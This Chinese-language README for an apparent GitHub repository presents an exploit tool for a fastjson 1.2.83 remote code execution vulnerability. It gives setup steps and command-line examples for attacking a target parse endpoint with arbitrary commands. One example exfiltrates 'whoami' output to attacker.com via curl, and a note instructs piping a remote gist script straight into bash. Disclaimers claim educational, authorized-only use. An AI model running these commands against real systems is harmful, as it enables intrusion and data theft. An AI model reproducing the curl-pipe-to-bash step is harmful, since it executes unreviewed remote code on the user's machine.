
已更新Aug 2, 2026
CVE-2026-16723 — 已更新!
CVE-2026-16723
CVE-2026-16723
捐赠
请通过 PayPal 或扫描下方二维码来支持本项目的维护。
⚡ 简单用法
请仅在安全且已获授权的环境中使用本项目,例如:
- 本地虚拟机
- Docker 容器
- 隔离的实验室环境
- 已获授权的渗透测试环境
示例设置:
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
示例用法:
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse
# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
注意:
- 从其他项目克隆时,你必须运行
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y来清除嵌套目录中的 .git - 例如:cve-2025-46822.sh、cve-2025-46822-lab.sh 等
致谢或参考
- https://fearsoff.org/research/fastjson-1-2-83-rce
- https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
- https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch
📚 教育性安全研究仓库
一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
⚠️ 安全与法律免责声明
目的
本仓库仅用于教育及已获授权的安全研究。
它旨在帮助用户了解:
- 安全漏洞
- 沙箱与隔离概念
- 安全编码与防御实践
仅限授权使用
请仅在您拥有许可的环境中使用本仓库,例如:
- 个人实验室或虚拟机
- Docker 或隔离环境
- 已获授权的渗透测试
- 网络安全培训或学术研究
严禁未经授权或非法使用。
免责条款
作者和贡献者不承担因本项目造成的任何损害、滥用、法律问题或损失的责任。
使用本仓库即表示您同意:
- 您对自己的行为负责
- 您将合法且合乎道德地使用它
- 本项目不提供任何担保
道德使用
本项目旨在用于:
- 防御性安全研究
- 网络安全教育
- 漏洞意识提升
- 安全的系统与软件研究
请遵循负责任披露实践,并遵守所有适用法律。
联系方式
如需进行负责任披露或合作,请通过 GitHub 联系仓库维护者。
